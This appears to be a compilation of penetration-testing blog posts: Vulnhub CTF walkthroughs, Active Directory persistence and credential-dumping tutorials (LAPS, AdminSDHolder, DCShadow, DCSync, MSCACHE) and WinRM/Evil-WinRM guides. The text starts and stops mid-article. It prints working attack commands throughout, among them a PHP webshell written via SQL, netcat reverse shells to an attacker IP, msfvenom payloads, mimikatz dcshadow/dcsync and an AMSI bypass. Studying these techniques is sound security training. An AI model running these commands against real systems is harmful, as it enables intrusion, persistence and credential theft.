I Hope, till here you have understood the working and importance of LAPS in any organisation. Now lets we how an attacker can take advantage of LAPs and dump the user’s credential .

 Metasploit

On compromised account of DC, use the following module of the Metasploit to extract the LAPS password for other end users.

This module will recover the LAPS (Local Administrator Password Solution) passwords, configured in Active Directory, which is usually only accessible by privileged users. Note that the local administrator account name is not stored in Active Directory, so it is assumed to be ‘Administrator’ by default.

use post/windows/gather/credentials/enum_laps
post(windows/gather/credentials/enum_laps) > set session 1
post(windows/gather/credentials/enum_laps) > exploit

As a result it will dump password in cleartext as shown in the image given below.

PowerShell Empire

Same can be done with the help of PowerShell Empire, it allows an attacker to dump the end-users’ credentials through a compromised account. It uses PowerShell script to get the LAPS password with the help of the following:

usemodule credential/get_lapspasswords
execute

Similarly, we it will also dump password in cleartext , thus an attacker can access the other machine present in the network with the help of extracted credentials.

Author: Kavish Tyagi is a Cybersecurity enthusiast and Researcher in the field of WebApp Penetration testing. Contact here

The post Credential Dumping: LAPS appeared first on Hacking Articles.

Today we are going to solve another boot2root challenge called “Victim:1”. It is available on Vulnhub for the purpose of Penetration Testing practices. This lab is not that difficult if we have the proper basic knowledge of cracking the labs. This credit of making this lab goes to iamv1nc3nt. Let’s start and learn how to successfully breach it.

Level: Easy to Intermediate

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this here.

Penetration Testing Methodology

Reconnaissance

• Nmap

Enumeration

• Wireshark

Exploiting

• Aircrack-ng
• SSH login

Privilege Escalation

• Abusing writeable file
• Capture the flag

Walkthrough

Reconnaissance

As we always identify host IP using netdiscover command and then continue with network scanning for port enumeration So, let’s start with nmap port enumeration and execute following command in our terminal.

nmap -p- -A 192.168.1.104

From its result, we found ports 22(SSH) , 80(http), 8080(http), 9000(http) were open.

Enumeration

For more detail, we will be needing to start enumeration against the host machine. Since port 80 is open I look toward browser and explore target ip 192.168.1.104 and found nothing useful.

Further on enumerating port 8999, the resultant page come up with the WordPress files and here WPA-01.cap file looks interesting; I download it to find out some clue.

 After downloading the cap file, we need to analyze it. So, when we open this file, it was a Wireshark cap file and by streaming the 1^st packet we noticed SSID: dlink as shown in the image. This can be probably used as a Password.

Exploiting

Further we used aircrack-ng for cracking the file captured.cap using the following command:

aircrack-ng -w /usr/share/wordlists/rockyou.txt WPA-01.cap

After a few minutes, we have found the key: p4ssword as shown in the image below.

We have a username and a password, so we tried to access the SSH on the target system and were successfully able to log in.

ssh dlink@192.168.1.104

After getting logged in let’s go for post-exploitation and try to escalate root privileged. While doing post enumeration we found writable permission is assigned on /var/www/bolt/public/files.

find / -writable -type d 2>/dev/null
cd /var/www/bolt/public/files
ls -la
cd files/
ls -la

Since the file directory was owned by root and also allow write permission for everyone thus we download php-reverse-shell from our local machine into host machine using wget command to do so execute the following command:

wget http://192.168.1.112:8000/php-reverse-shell-php
ls

Further, we will execute our php-reverse-shell in browser but before that fire up netcat in another terminal to get a reverse shell with root privileges and capture the final flag.

nc -lvp 1234
id
cd /root
ls
cat flag.txt

2^nd method for privilege escalation

As we know nohup is a command which executes another program specified as its argument and ignores all signup (hangup) signals. It runs with the SUID bit set and may be exploited to access the file system, escalate or maintain access with elevated privileges working as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.  nohup Privilege Escalation

find / -writable -type d 2>/dev/null
nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
id
cd /root
ls
cat flag.txt

Author: Japneet Kaur Gandhi is a Technical Writer, Researcher and Penetration Tester. Contact  here

The post Victim:1 Vulnhub Walkthrough appeared first on Hacking Articles.

Today we are going to solve another boot2root challenge called “LemonSqueezy:1”. It is available on Vulnhub for the purpose of Penetration Testing practices. This lab is not that difficult if we have the proper basic knowledge of cracking the labs. This credit of making this lab goes to James Hay. Let’s start and learn how to successfully breach it.

Level: Easy to Intermediate

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this here

Penetration Testing Methodology

Reconnaissance

Nmap

Enumeration

• Abusing HTTP Services
• Web Directory Bruteforce (dirb)
• Wpscan for Username and Password Enumeration

Exploitation

• Logging to WordPress
• Shell Uploading through PhpMyAdmin

Post Enumeration

• Using LinEnum.sh
• Creating Netcat Shell using msfvenom

 Privilege Escalation

• Abusing cronjob for Writable Script
• Capture the flag

Walkthrough

Reconnaissance

As you know, this is the initial phase where we choose netdiscover for network scan for identifying host IP and this we have 192.168.1.105 as our host IP.

Then we used nmap for port enumeration. We found port 80 for http.

nmap -A 192.168.1.105

Enumeration

For more detail, we will be needing to start enumeration against the host machine. Since port 80 is open I look toward browser and explore target ip 192.168.1.105 . But it is not much of great help. Moving on.

http://192.168.1.105

Further, we use dirb for directory brute-forcing and found phpmyadmin & wordpress page with status code 200 OK on executing following command.

dirb http://192.168.1.105

When we searched the above-listed page, i.e. wordpress we found nothing useful.

http://192.168.1.105/wordpress

So, the first idea that came to us was to run a wpscan on the webpage and see what the scan enumerates.

wpscan --url http://192.168.1.105/wordpress -e u

I found two user names: orange and lemon.

Now the next job is to hunt for a password for user orange for which we will use rockyou.txt. Time to fire up wpscan with our username & password list to valid user login combination.

wpscan --url http://192.168.1.105/wordpress -U orange -P /usr/share/wordlist/rockyou.txt

We have successfully found the password for orange. Let’s make good use of them.

Orange:ginger

 Now we mapped the domain name with the target machine’s IP address in the /etc/hosts file.

Further, we login to WordPress using orange credentials. It was holding another clue for us in edit post section we found a password i.e. nOt1n@wOrdl1st! .

Now our next job is to try to login phpmyadmin page with this password using user orange.

http://192.168.1.105/phpmyadmin

Exploitation

After logging in let’s explore the page further to find some juicy information.

Here we found the database named wordpress.

So, we have login into phpmyadmin, now it was time to exploit phpMyAdmin to get a reverse connection and we have already published a post on “Shell Uploading in Web Server through PhpMyAdmin”. With the help of this post, I try to exploit phpMyAdmin and follow the given steps.

Within the database of WordPress, we created a table as I have given raj and click on create.

Click on raj to construct an MYSQL query inside your database. Hence click on SQL tab where you can enter the SQL query code.

Now, the next part is interesting because here I am going to execute malicious code as SQL query which will create a Remote code Execution inside the webserver. In the following screenshot, you can see I have given above malicious php code as SQL query and then click on GO tab to execute it.

SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/wordpress/backdoor.php"

Now type the following URL to find whether we are successful or not in order to create RCE vulnerability.

http://192.168.1.101:81/wordpress/backdoor.php?cmd=whoami

When you execute the above URL in the browser you will get the information of victim ‘s PC.

Now it was time to get netcat reverse connection of the host machine by executing the following URL.

 http://192.168.1.105/wordpress/backdoor.php?cmd=nc  -e /bin/bash 192.168.1.112 1234

Now before executing the backdoor let’s fire up netcat listener in another terminal.

nc -lvp 1234

Oh Yeah!! We got the reverse shell, but it is not a proper shell. We will spawn a tty shell using python.

python -c 'import pty;pty.spawn("/bin/bash")
ls

here we found a text file name user.txt as 1^st flag. Now let go for Privilege Escalation with the help of Linenum.sh which will help us in post enumeration.

cat user.txt

Post Enumeration

Next, we tried to download linenum.sh in /tmp but we were not able to do so because /tmp was not having the permission to do so. Since /var/www/html/wordpress is writable we will try to download there.

LinEnum.sh is bash script used for enumerating the Linux machine to checks which services are running on the machine, privileges access, version information, system information, user information etc.

1. Download the script or get the location where this script is stored.
2. Host the python server and copy the link of the LinEnum.sh file.
3. Download the script in the remote host using “wget” command in the “/var/www/html/wordpress” directory.
4. Change the permission of the LinEnum.sh shell script using “chmod” command.
5. Now run the script in the remote machine.

cd /var/www/html/wordpress
wget http://192.168.1.112:8000/LinEnum.sh
chmod 777 LinEnum.sh
./LinEnum.sh

So here got some information after running the shell script LinEnum.sh

As a result, we found that /etc/logrotate.d/logrotate is writable and also run as cronjob at every 2 minutes after.

cat /etc/crontab
cd /etc/logrotate.d
ls -la

Privilege Escalation

In order to compromise the machine and get the root access, we will use msfvenom for our further exploitation.

msfvenom -p /cmd/unix/reverse_netcat lhost=192.168.1.112 lport=4444 R

As we know logrotate is writable and run as a cronjob, therefore, I will overwrite this file with the following command.

echo "code here" > logrotate

On other hand we will fire up netcat listener in another terminal to get a reverse shell and wait for some 2 minutes as soon as the logrotate will execute as cronjob this will give us root privileges shell and finally capture the final flag.

nc -lvp 4444
id
cd /root
ls
cat root.txt

Author: Japneet Kaur Gandhi is a Technical Writer, Researcher and Penetration Tester. Contact here

The post LemonSqueezy:1 Vulnhub Walkthrough appeared first on Hacking Articles.

Today we are going to crack this machine called “Seppuku:1”. It is available on Vulnhub for the purpose of Penetration Testing practices. It was an intermediate box which made me learn many new things. This credit of making this lab goes to SunCSR Team. Let’s start and learn how to successfully breach it.

Level:  Intermediate to Hard

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this here

Penetration Testing Methodology

Reconnaissance

• Netdiscover
• Nmap

Enumeration

• Abusing HTTP Services
• Dirb

Exploiting

• Brute forcing using hydra
• Connecting using SSH
• Bypassing Restricted shell

Privilege Escalation

• Abusing Sudo
• Capture the flag

Walkthrough

Reconnaissance

As you know, this is the initial phase where we choose netdiscover for network scan for identifying host IP and this we have 192.168.1.104 as our host IP.

Then we used nmap for port enumeration. We found that port 21 for ftp, port 22 for ssh, port 80 for http, 139 and 445 for NetBIOS-ssn, port 7080 for SSL/http, port 7601 for http, port 8088 for http.

nmap -p- -A 192.168.1.104

Enumeration

For more detail, we will be needing to start enumeration against the host machine. Since port 7601 is open I look toward browser and explore target ip 192.168.1.104  but unfortunately found nothing useful.

http://192.168.1.104:7601

Further, we use dirb for directory brute-forcing and found secret & key with status code 200 OK on executing following command.

dirb http://192.168.1.104:7601

When we navigate URL enumerated above, i.e. keys we found some files, here private was useful for us.

http://192.168.1.104:7601/keys

This link leads us to a page called private. This is a private key for some user which we have not found yet.

Further, we will explore our next directory called secret which we found in our dirb scan.

http://192.168.1.104:7601/secret

AS result it gives some very important files such as password.lst and hostname.

Here found a file named hostname which gave us a username i.e. seppuku.

Exploiting

We have got username seppuku , now our next job is to find the password for the user seppuku with the help of hydra for SSH login brute force. Here the best way to guess password is to use the password file which we found in the secret directory during dirb scan.

hydra -l seppuku -P /root/Desktop/password.lst 192.168.1.104 ssh

From its result, we found the password eeyoree for seppuku.

We have a username and password, so we tried to access the SSH on the target system and we were successfully able to log in.

ssh seppuku@192.168.1.104

 After getting logged in let’s go for further investigation to find some hidden files. As a result, we found a hidden file called .passwd which gave us a password for what we don’t know right now.

After that, we tried to go inside the home directory, but we were not able to do so because of restricted rbash shell.

ls -la
cat .passwd
cd /home

Since we know the ssh credentials of the user who is part of rbash shell, then you can use the following command along ssh to break the jail and bypass the rbash by accessing proper bash shell.

ssh seppuku@192.168.1.104 -t "bash --noprofile"

Now we will again try to access the home directory this time we were successful in doing so. Now we will again check the hidden files where we found 2 new users named samurai and tanto.

So let’s dive in by getting logged in as samurai with the password we found in .passwd hidden file.

cd /home
su samurai

Let us use the sudo -l command to enumerate if this user can run some application with root privileges.

sudo -l

 We found seppuku user can run .cgi_bin/bin command as the samurai user which suppose have the root access.

Privilege Escalation

If you remembered we have enumerated private key when while performing directory brute force, here I copied the content of private file found in key during dirb scan and saved it into an empty file named sshkey with chmod 600 permissions.

chmod 600 sshkey

Since we port 22 open on the target machine, we will try to connect the target machine using this key for user TANTO and execute the following command.

ssh -i sshkey tanto@192.168.1.104 -t "bash –noprofile"
ls -la

After login as tanto, we looked for .cgi_bin directory that will be executed through sudo user but unfortunately, I was unable to find this directory, therefore, I made a directory as .cgi_bin and save the bash script in a file named as “bin” to get bash shell through it.

mkdir .cgi_bin
cd .cgi_bin/
echo "/bin/bash" > bin
chmod 777 bin
ls -la

Now it was time to exploit .cgi_bin program, thus again we logged as Samurai and run the following command and obtain the root shell and finished the challenge by capturing the root flag . 

sudo ../../../../../../../home/tanto/.cgi_bin/bin /tmp/*
cd /root
ls
cat root.txt

Author: Japneet Kaur Gandhi is a Technical Writer, Researcher and Penetration Tester. Contact  here

The post Seppuku:1 Vulnhub Walkthrough appeared first on Hacking Articles.

In this post, we will discuss the Persistence attack on Active Directory by abusing AdminSDHolder. This attack is an actual threat because of This attack leverage into another dynamic attack such as  DCSync Attack and Golden ticket Attack.

AdminSDHolder

Active Directory Domain Services uses AdminSDHolder, protected groups and Security Descriptor propagator (SD propagator or SDPROP for short) to secure privileged users and groups from unintentional modification. Unlike most objects in the Active Directory domain, which are owned by the Administrators group, AdminSDHolder is owned by the Domain Admins group.

The AdminSDHolder object has a unique Access Control List (ACL), which is used to control the permissions of security principals that are members of built-in privileged Active Directory groups.  Every hour, a background process runs on the domain controller to compare manual modifications to an ACL and overwrites them so that the ACL matches the ACL on the AdminSDHolder object.

Read from here for more detail.

AdminSDHolder Persistence Attack

On compromised domain controller with administrator privilege, the attacker is capable to create a permanent backdoor for his future attack by abusing AdminSDHolder. With the help of this attack, we will be able to alter AdminSDHolder by adding a new user to its Access Control List.

Here we will try to add user Yashika into ACL of AdminSDHolder object in order to change privilege for user yashika. Current User yashika is a domain user as shown below.

Follow the step to learn how an attacker can conduct AdminSDHolder attack.

1. Navigate to Active Director User and Computers
2. Explore Menu > View> Advanced Features

3. Explore System > AdminSDHolder > Properties

4. Add user to whom you want to give Full Permission. Here I have chosen user: “Yashika”

 5.Give Full Permission by enabling All check box.

As we mention background process runs, by default, every sixty (60) minutes but default frequency for running Security Descriptor Propagator process could be changed by creating a REG_DWORD registry entry and setting the new frequency value.

This can be done on compromised DC by executing the following command inside command prompt which will reset Security Descriptor Propagator process for 3 minutes (300 as decimal & 12c as hexadecimal)

REG ADD HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /V AdminSDProtectFrequency /T REG_DWORD /F /D 300

To ensure the fruitful result of the above command, explore the following path: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters

After three minutes we checked to identify for user “yashika” using net user command and notice Yashika has become the member of the domain admin group.

net user yashika /Domain

Even if the administrator tries to remove yashika form domain admin group then after 3 minute due to Security Descriptor Propagator process it will again add Yashika into Domain Admin Group.

The post Domain Persistence AdminSDHolder appeared first on Hacking Articles.

In this post, we are going to discuss the most dynamic attack on AD named as DC Shadow attack. It is part of Persistence which create rogue Domain controller in the network. This attack is an actual threat because of This attack leverage into another dynamic attack such as  DCSync Attack and Golden ticket Attack.

DCShadow Attack

Dcshadow is a feature in mimikatz that manipulating Active Directory (AD) data, including objects and schemas, by registering and replicating the behaviour of a Domain Controller (DC). It simulates the behaviour of a Domain Controller (using protocols like RPC used only by DC) to inject its own data, bypassing most of the common security controls and including your SIEM. It shares some similarities with the DCSync attack (already present in the lsadump module of mimikatz)

It is a post-exploitation attack (also called domination attack) because it requires domain admin (or enterprise admin) privileges

Description of the attack

The attacks are done using the following steps:

• registering the “DC” by creating 2 objects in the CN=Configuration partition and altering the SPN of the computer used.
• Pushing the data (triggered using DrsReplicaAdd, KCC or other internal AD events)
• Removing the object previously created to demote the DC

Walkthrough

Using the compromised user account we identify the identity of logon user “Yashika” and notice it is member of Domain User group.

To perform the DC SHADOW attack, you need to download and install mimikatz inside the host machine and run it as an administrator in order to execute “!+” and “!processtoken” command. This will register and start mimidrv service and try to elevate for privilege token thus it provides privilege to call kernel-level functions via a user-mode application.

!+
!processtoken
token::whoami

Thus with the help of “token::whoami” we can enumerate the current identity. As you can observe that it has shown “NT Authority/System” privilege.

Now execute the following command which will mimic as a bogus domain controller in the network and try to add user Yashika in the domain admin group.

lsadump::dcshadow /object:yashika /attribute:primaryGroupID /value:512

Open one more mimikatz in a new terminal and execute the following command which will try to push bogus domain controller into legitimate.

lsadump::dcshadow /push

So, after executing the above-mentioned command, we checked identity for user yashika again and noticed that this time it becomes the member of the domain admin group.

net user yashika /Domain

Why DCshadow is a dynamic attack, because if you have added the user into PrimaryGroupID object then it will be not easy for an administrator to remove any user from inside domain admin group.

This attack also becomes a ladder for carrying out other attacks like the DCsync attack. As we discussed earlier, if a host is a member of a privileged group such as a domain administrator or enterprise, an intruder can imitate as a domain controller with dcsync attacks and can request user NTLM hashes from other domain controllers on the network, read more about it from here.

lsadump::dcsync /domain:ignite.local /user:krbtgt

Once the intruder is able to get hashes of KDC server, further he can carry out the Golden Ticket attack which read from here, therefore we called DC Shadow is the most dynamic attack on AD.

Reference: https://www.dcshadow.com/

The post Domain Persistence: DC Shadow Attack appeared first on Hacking Articles.

In this post, we will discuss the most famous framework for PS Remote shell hacking tool named as “Evil-Winrm”. It is an opensource tool which is available on GitHub for winrm penetration testing.

Table of Content

• Evil-winrm
• Features
• Installation
• Load PowerShell scripts
• Pass the Hash
• Install using its Docker image

Evil-winrm

This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985), of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but most of its features are focused on hacking/pentesting stuff.

Features

• Compatible to Linux and Windows client systems
• Load in memory Powershell scripts
• Load in memory dll files bypassing some AVs
• Load in memory C# (C Sharp) assemblies bypassing some AVs
• Load x64 payloads generated with awesome donut technique
• AMSI Bypass
• Pass-the-hash support
• Kerberos auth support
• SSL and certificates support
• Upload and download files showing a progress bar
• List remote machine services without privileges
• Command History
• WinRM command completion
• Local files completion
• Colorization on prompt and output messages (can be disabled optionally)
• Docker support (prebuilt images available at Dockerhub)
• Trap capturing to avoid accidental shell exit on Ctrl+C

Installation

In the post, we have discussed two easy methods to install winrm in your Kali Linux, you will find more method for installation from GitHub.

With the help of Ruby gem, you can directly install the evil-winrm, it will automatically install all dependency in your machine by executing following command.

gem install evil-winrm

once it will get installed you can pull its HELP option by typing ‘evil-winrm’ that will display the syntax and other operators for executing evil-winrm against windows remote management service.

Now using evil-winrm we try to access remote machine shell by connecting through port 5985 open for winrm. As a result, it will give the access of victim shell by providing its Powershell as given below.

Syntax: evil-winrm -i <Windows IP> -u <username> -p <’password’>

evil-winrm -i 192.168.1.105 -u administrator -p 'Ignite@987'

It will not only provide a shell of the host machine but also provide a menu to load function such as Invoke-Binary, Dll-Loader, Donut-Loader and Bypass-4MSI.

Load PowerShell scripts

So we have some pen testing powershell script in the /root/powershell and we can upload this ps1 script through evil winrm on the host machine.

The .PS1 scripts must be in the path set at -s argument and execute this as given below:

Syntax: evil-winrm -i <Windows IP> -u <username> -p <’password’> -s <path>

evil-winrm -i 192.168.1.105 -u administrator -p 'Ignite@987' -s /root/powershell

Type menu again and see the loaded functions and use Bypass 4MSI then Invoke the script. Here we have tried to upload mimikatz PowerShell script to dump stored credential.

menu
Bypass 4MSI
Invoke-Mimikatz.ps1
Invoke-Mimikatz

As a result, it has dumped all the credential of the Windows Server.

Pass the Hash

It has one more feature which allows you to conduct Pass the HASH attack and as a result it gives the shell of the host machine.

Install using its Docker image

This is a very easy and convenient method to install winrm on your attacking machine and simultaneously provide the shell of the victim machine by compromising it winrm service. Only you need to execute the following command.

docker run --rm -ti --name evil-winrm  oscarakaelvis/evil-winrm -i 192.168.1.105 -u Administrator -p 'Ignite@987'

The post Evil-Winrm : Winrm Pentesting Framework appeared first on Hacking Articles.

Today we’re going to solve another boot2root challenge called “Natraj”. It’s available at Vulnhub for penetration testing practice. This lab is not difficult if we have the right basic knowledge to break the labs and are attentive to all the details we find during the reconnaissance. The credit for making this lab goes to Hacking Articles. Let’s get started and learn how to break it down successfully.

Level: Not defined

Since these labs are available on the Vulnhub website. Let’s download the lab file from here.

Penetration Testing Methodology

Reconnaissance

• Netdiscover
• Nmap

Enumeration

• Dirb
• LinEnum

Exploitation

• RCE with LFI and SSH Log Poisoning

Privilege Escalation

• Abuse of Apache configuration file permissions
• Abusing SUDO
• Capture the flag

Walkthrough

Reconnaissance

Like always we will identify the host’s IP with the “Netdiscover” tool.

netdiscover

So, let’s start by listing all the TCP ports with nmap.

nmap -sV -sC -p- 192.168.10.156

Enumeration

We started by visiting the web service (port 80), where we have found several pictures and information about the Natraj, we will check the source code and robots.txt, it seems that there is nothing useful. (or at least, for the moment). So let’s proceed further.

With the help of Dirb and it’s default dictionary, we have found a directory called “console“.

We go in and list a file called “file.php“:

If we execute it, we see that it does nothing. We probably need to add something else

Now I decided to use the same file name as the “GET” variable and try to do a proof of concept (POC) to check if the site was vulnerable to Local File Inclusion (LFI).

Exploiting

After examining I found that it was vulnerable and that the site was using an Apache server, I tried to perform an RCE (Remote Command Execution) by poisoning the Apache log, but I was not successful.

After further testing of other options, I saw that I do have the Access to the “auth.log” file, where SSH service logs appear.

Malicious sending:

Response from the server:

After this, we can try writing PHP code inside the SSH command for the connection:

We make another request, this time we indicate in the variable a “id” and check that it is indeed vulnerable.

Great! now, we’ll put a listening netcat on port 1234 and run the command to get the reverse Shell.

We will pass this line to URL-Encode:

And we will send the request as shows in image below:

If everything went well, we will have a reverse shell with the user “www-data”:

We execute the following commands to get an interactive shell.

We use the tool “LinEnum” and see that we have to write permissions in the file “/etc/apache2/apache2.conf”.

Privilege Escalation (user)

I downloaded the file in my machine and edited these lines, specifying the username “mahakal”.

We set up an HTTP server with Python, Download the file to the machine and replace the original.

Now, we’ll have to create a reverse Shell in PHP so that when we will run it, we take control of it as the user “mahakal”.

This web Shell will be hosted in the directory “/var/www/html“.

Now we’ll put a Netcat to listen on port 5555.

We’ll reboot the machine and run the “shell.php” file:

We go back to our shell with Netcat and check that we are already inside the machine with the user account “mahakal”.

Privilege Escalation (root)

We do a “sudo -l” and see that we have permission to run the nmap binary as root and without a password.

We return to execute the necessary commands to get an interactive shell.

The idea is to raise a shell as root, for this we will put the command in a variable and then we will call it with nmap emulating a script, we can do it in the following way.

And having already hijacked the root account, we only have to read the flag and complete this great machine.

Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks

Contact on LinkedIn.

The post HA: Natraj Vulnhub Walkthrough appeared first on Hacking Articles.

In this post, we will discuss all possible methods and tools used for WinRM penetration testing. Let’s get deep into WinRM service and its security assessment and learn more. This attack can be performed locally (using windows client machine) and remotely (using Kali Linux).

Lab Setup

Windows Server 2016: 192.168.1.105

Windows 10 client: 192.168.106

Kali Linux: 192.168.1.112

Table of Content

WinRM Service

• History of WinRM
• WinRM Configuration
• Testing Connection

Lateral Movement- Locally

• Connecting Server shell using CMD
• Connecting Server shell using PowerShell

Lateral Movement- Remotely

• Scanning
• Identify the WinRM Authentication Method
• Winrm Login Brute Force
• Connect to Remote Shell through Ruby script
• Connecting Remote Shell through Evil-WinRM
• Connecting Remote Shell through PowerShell Empire
• Connecting Remote Shell through Docker
• Connecting Remote Shell through Crackmapexec

WinRM Service

WinRM is a command-line tool that enables administrators to remotely execute the CMD.exe commands using the WS-Management protocol. This specification describes a general SOAP-based protocol for managing systems such as PCs, servers, devices, Web services, other applications, and other manageable entities. It port 5985 for HTTP transport and 5986 for HTTPS Transport.

On server and client versions of the Windows operating system, Enable-PSRemoting allows the administrator to access the remote shell using Powershell for private and domain networks through WinRM service.

History of WinRM

Versions 1.1 of Winrm have been found in Windows Vista and Windows Server 2008. Its versions 2.0 have been found in Windows 7 and Windows Server 2008 R2 and the latest version 3.0 is pre-installed in Windows 8 and Windows 2012 Server, but you need to enable it in Windows 10.

WinRM Configration

Configuring and installing WinRM is quite simple, but you only need to execute commands below that will enable WinRM on the server for trusted hosts. Here we have given the wildcard character (*) for all the machines on the network. This type of configuration cloud is a threat to the server because it allows any machine to connect to a server that knows the server’s credential.

Enable-PSRemoting –force
winrm quickconfig -transport:https
Set-Item wsman:\localhost\client\trustedhosts * 
Restart-Service WinRM

Note:  WinrRM Service should be Enabled on both machine (Server and client)

Testing Connection

Now, with the help of the following command, we can check the server ‘s connectivity through any host machine on the network.

test-wsman -computername "WIN-S0V7KMTVLD2"
test-wsman -computername "192.168.1.105"

As you can see, the version details of the protocol and the product have been revealed, so this shows that we are capable of connecting to the server.

Lateral Movement- Locally

Connecting Server shell using CMD

As we know, WinRM is used to get a remote machine shell just like SSH, so if you have compromised an account or system that is a trusted host, you can access the server shell with the help of CMD. Here, first, we try to run the system command remotely using the server credential and execute the following command.

winrs -r:192.168.1.105 -u:ignite.local\administrator -p:Ignite@987 ipconfig

Since we were able to run system command remotely thus, we try to access a remote shell with the help of the following command.

winrs -r:192.168.1.105 -u:ignite.local\administrator -p:Ignite@987 CMD

Connecting Remote shell using PowerShell

Just like a command prompt, you can also use PowerShell to remotely run arbitrary system commands and thus execute the following command through a compromised system.

Invoke-Command -ComputerName "192.168.1.105" -Credential workgroup\administrator -Authentication Negotiate -Port 5985 -ScriptBlock {net user administrator}

As a result you can we have enumerated user details for the administrator account.

Similarly, you can use PSSession to get a remote shell with PowerShell, so we need to run the following and get a server shell.

Enter-PSSession -ComputerName 192.168.1.105 -Credential administrator

Lateral Movement- Remotely

Scanning

So, first, you need to scan the host IP in order to identify available ports for WinRM and Nmap is the best tool to do so.

nmap -p5985,5986 -sV 192.168.1.105

From its scan, we found that 5985 (HTTP) is available for unsecure WinRM connections and 5986 (HTTPS) is available for secure WinRM connections.

Identify the WinRM Authentication Method

Further use can you Metasploit auxiliary to identify Authentication Method used by WinRM. This module sends a request to an HTTP/HTTPS service to see if it is a WinRM service. If it is a WinRM service, it also gathers the Authentication Methods supported.

use auxiliary/scanner/winrm/winrm_auth_methods
msf auxiliary(winrm_auth_methods) > set rhosts 192.168.1.105

WinRM Login Brute Force

This module attempts to authenticate to a WinRM service. It currently works only if the remote end allows Negotiate (NTLM) authentication. Kerberos is not currently supported. Please note: in order to use this module without SSL, the ‘AllowUnencrypted’ winrm option must be set. Otherwise, adjust the port and set the SSL options in the module as appropriate.

use auxiliary/scanner/winrm/winrm_login
msf auxiliary(scanner/winrm/winrm_login) > set rhosts 192.168.1.105
msf auxiliary(scanner/winrm/winrm_login) > set user_file /root/user.txt
msf auxiliary(scanner/winrm/winrm_login) > set pass_file /root/pass.txt
msf auxiliary(scanner/winrm/winrm_login) > set stop_on_success true
msf auxiliary(scanner/winrm/winrm_login) > exploit

As a result, it will try a valid combination of username and password and dump the output accordingly.

Connect to Remote Shell through Ruby script

You can download the ruby script from GitHub that allow the Linux system to connect with Windows Protocol WinRM and provide the access of the PowerShell of the target machine. You can download it from here and add Target IP, username as well as password inside the download script then install WinRM in your local machine and execute the script.

gem install winrm
ruby winrm-shell.rb

As a result, you will get PowerShell access to the target machine as shown.

Connecting Remote Shell through Evil-WinRM

Now using evil-winrm we try to access remote machine shell by connecting through port 5985 open for winrm. In our previous article we have already discussed on Evil-Winrm and its usage, you can more about it from here.

evil-winrm -i 192.168.1.105 -u administrator -p 'Ignite@987'

As a result, it will give access to victim shell by providing its PowerShell as given below.

Connecting Remote Shell through PowerShell Empire

Once you’ve compromised the host machine using the empire, as we’ve done here. Using Powershell Empire, you can perform post-exploitation to access the server shell via the client machine using the WinRM service.

usemodule lateral_movement/invoke_psremoting
set Listener http
set ComputerName 192.168.1.105
set UserName administrator
set Password Ignite@987
execute

And finally! We got the shell of the server through client machine.

Connecting Remote Shell through Docker

Docker image of PowerShell with NTLM support to allow for PS-Remoting from Linux to Windows, hence we can use this to access the shell of the server by executing following command.

Read more from here.

docker run -it quickbreach/powershell-ntlm

Once it will install the docker image, you will get the session for login credential as shown below in the image. As soon as you will enter the server login it will give a shell of the server.

Connecting Remote Shell through Crackmapexec

Now using Crackmapexec we try to execute arbitrary system command remotely by connecting through port 5985 open for winrm. In our previous article we have already discussed on Crackmapexec and its usage, you can more about it from here.

crackmapexec winrm 192.168.1.105 -u 'Administrator' -p 'Ignite@987' -x ipconfig

As a result, it gives the output for request command as shown.

Reference: https://docs.microsoft.com/en-us/windows/win32/winrm/about-windows-remote-management

The post WinRM Penetration Testing appeared first on Hacking Articles.

In this post, we are going to discuss the domain cache credential attack and various technique to extract the password hashes by exploiting domain user.

Table of Content

• Domain Cache credential
• Metasploit
• Impacket
• Mimikatz
• PowerShell Empire
• Koadic
• Python Script

Domain Cache credential (DCC2)

Microsoft Windows stores previous users’ logon information locally so that they can log on if a logon server is unreachable during later logon attempts. This is known as Domain Cache credential (DCC) but in-actually it is also known as MSCACHE or MSCASH hash. It sorted the hash of the user’s password that you can’t perform pass-the-hash attacks with this type of hash. It uses MSCACHE algorithm for generating password hash and that are stored locally in the Windows registry of Windows operating system. These hashes are stored in the Windows registry, by default the last 10 hashes.

There two versions of MSCASH/MSCACHE or DCC

• MSCACHEV1 or DCC1 used before Vista Server 2003
• MSCACHEV2 or DCC2 used after Vista & Server 2003

Walkthrough

Metasploit

Metasploit helps the pen tester to extract the stored hashes by exploit registry for MSCACHE stored hashes. This module uses the registry to extract the stored domain hashes that have been cached as a result of a GPO setting. The default setting on Windows is to store the last ten successful logins.

use post/windows/gather/cachedump
set session 2
exploit

As a result it will dump the password hashes, and these fetched from inside DCC2/MSCACHE as shown in the image given below.

Impacket

This hash can be extracted using python impacket libraries, this required system and security files stored inside the registry. With the help of the following command, you can pull out these files from the registry and save on your local machine.

reg save hklm\system c:\system
reg save hklm\security c:\secuirty

Further copy the system and security file on that platform where impacket is installed, in our case we copied it inside kali Linux and use the following for extracting DCC2/MSCACHE hashes.

python secretsdump.py -security -system system LOCAL

Boom!!!! You will get the DCC2/MSCACHEv2 hashes on your screen.

Mimikatz

As we all know, mimikatz is one of the best penetration testing tools for credential dumping windows. So, we can get DCC2 / MSCACHEv2 hashes using mimikatz by installing it on a compromised host and executing the following command:

privilege::debug
token::elevate
lsadump::cache

And again, you will get the MSCACHEv2 hashes on your screen.

PowerShell Empire

Moving to our next technique, PowerShell Empire has a module that extracts the MSCACHEV2 hashes from the inside registry of the compromised machine. So, download and run Empire on your local machine and compromise the host machine once to use the empire post module and then type as follows:

usemodule credentails/mimikatz/cache
set agent <agent_id>
execute

And again, you will get the MSCACHEv2 hashes on your screen.

Koadic

